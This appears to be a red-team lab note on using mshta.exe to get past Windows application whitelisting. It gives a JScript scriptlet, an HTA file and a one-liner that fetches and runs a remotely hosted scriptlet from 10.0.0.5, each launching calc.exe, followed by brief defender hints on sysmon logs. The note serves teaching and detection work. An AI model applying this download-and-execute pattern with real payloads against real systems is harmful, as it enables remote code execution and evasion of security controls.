offensive security
MSHTA
MSHTA code execution - bypass application whitelisting.
Execution
Writing a scriptlet file that will launch calc.exe when invoked:
http://10.0.0.5/m.sct
1
<?XML version="1.0"?>
2
<scriptlet>
3
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
4
​
5
<public>
6
<method name="Exec"></method>
7
</public>
8
​
9
<script language="JScript">
10
<![CDATA[
11
function Exec() {
12
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
13
}
14
]]>
15
</script>
16
</scriptlet>
Copied!
Invoking the scriptlet file hosted remotely:
1
# from powershell
2
/cmd /c mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();
Copied!
Observations
As expected, calc.exe is spawned by mshta.exe. Worth noting that mhsta and cmd exit almost immediately after invoking the calc.exe:
As a defender, look at sysmon logs for mshta establishing network connections:
Also, suspicious commandlines:
Bonus
The hta file can be invoked like so:
1
mshta.exe http://10.0.0.5/m.hta
Copied!
or by navigating to the file itself, launching it and clicking run:
http://10.0.0.5/m.hta
1
<html>
2
<head>
3
<script language="VBScript">
4
Sub RunProgram
5
Set objShell = CreateObject("Wscript.Shell")
6
objShell.Run "calc.exe"
7
End Sub
8
RunProgram()
9
</script>
10
</head>
11
<body>
12
Nothing to see here..
13
</body>
14
</html>
Copied!
References
Signed Binary Proxy Execution: Mshta, Sub-technique T1218.005 - Enterprise | MITRE ATT&CK®
Last modified 3yr ago
Copy link